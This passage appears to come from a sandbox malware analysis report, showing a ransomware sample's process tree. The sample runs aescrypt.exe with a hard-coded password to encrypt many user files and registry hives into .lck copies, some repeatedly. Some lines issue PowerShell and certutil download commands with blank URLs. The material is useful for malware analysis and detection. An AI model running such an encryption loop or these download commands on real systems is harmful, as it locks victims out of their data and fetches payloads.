C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck" "SwitchRedo.svg.lck"
3⤵
PID:1824

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck.lck" "SwitchRedo.svg.lck.lck"
3⤵
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5176

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:5284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CompareMerge.midi.lck" "CompareMerge.midi"
3⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WatchSplit.xht.lck" "WatchSplit.xht"
3⤵
PID:5356

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InstallConvertFrom.dotm.lck" "InstallConvertFrom.dotm"
3⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitRename.mp3.lck" "LimitRename.mp3"
3⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SearchRedo.vdx.lck" "SearchRedo.vdx"
3⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UseMeasure.vssx.lck" "UseMeasure.vssx"
3⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExportDebug.wps.lck" "ExportDebug.wps"
3⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UnprotectRevoke.xps.lck" "UnprotectRevoke.xps"
3⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceResize.ini.lck" "TraceResize.ini"
3⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PingLock.vdx.lck" "PingLock.vdx"
3⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ClearCompress.ppsm.lck" "ClearCompress.ppsm"
3⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditProtect.jfif.lck" "EditProtect.jfif"
3⤵
PID:5528

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RequestSave.xltm.lck" "RequestSave.xltm"
3⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupInvoke.tiff.lck" "BackupInvoke.tiff"
3⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishAdd.sql.lck" "PublishAdd.sql"
3⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameFind.M2V.lck" "RenameFind.M2V"
3⤵
PID:5592

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResolveEnable.docm.lck" "ResolveEnable.docm"
3⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisconnectWait.dll.lck" "DisconnectWait.dll"
3⤵
PID:5624

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeShow.7z.lck" "OptimizeShow.7z"
3⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupMount.mpeg2.lck" "BackupMount.mpeg2"
3⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GrantTest.cab.lck" "GrantTest.cab"
3⤵
PID:5672

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishDismount.tif.lck" "PublishDismount.tif"
3⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResolveTest.lnk.lck" "ResolveTest.lnk"
3⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConvertShow.ppsm.lck" "ConvertShow.ppsm"
3⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddReset.dib.lck" "AddReset.dib"
3⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MeasureWatch.shtml.lck" "MeasureWatch.shtml"
3⤵
PID:5752

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeUnpublish.TS.lck" "ResumeUnpublish.TS"
3⤵
PID:5768

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CompareReceive.txt.lck" "CompareReceive.txt"
3⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EnableMeasure.lnk.lck" "EnableMeasure.lnk"
3⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MergeExport.3gp.lck" "MergeExport.3gp"
3⤵
PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:5832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5948

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:6052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
3⤵
PID:6104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:6116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c Invoke-WebRequest -Uri -OutFile
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3232

C:\Windows\system32\certutil.exe
certutil -urlcache -split -f
3⤵
PID:5216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
3⤵
PID:5300

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.ini.lck" "ntuser.ini"
3⤵
PID:5320

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf"
3⤵
PID:5332

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
3⤵
PID:5348

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms"
3⤵
PID:5372

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms"
3⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NTUSER.DAT.lck" "NTUSER.DAT"
3⤵
PID:5408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
3⤵
PID:5436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4176

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5492

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5524

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5612

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5680

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5716

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5756

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:5812

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5820

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5856

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6008

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:5984

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:5964

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck"
3⤵
PID:5976

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck"
3⤵
PID:6004

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck"
3⤵
PID:6020

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck.lck.lck.lck.lck"
3⤵
PID:6036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
3⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
3⤵
PID:6072

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck" "90737d32e3aba4b.timestamp.lck"
3⤵
PID:6068

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck"
3⤵
PID:6052

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "90737d32e3aba4b.timestamp.lck.lck.lck.lck" "90737d32e3aba4b.timestamp.lck.lck.lck"
3⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
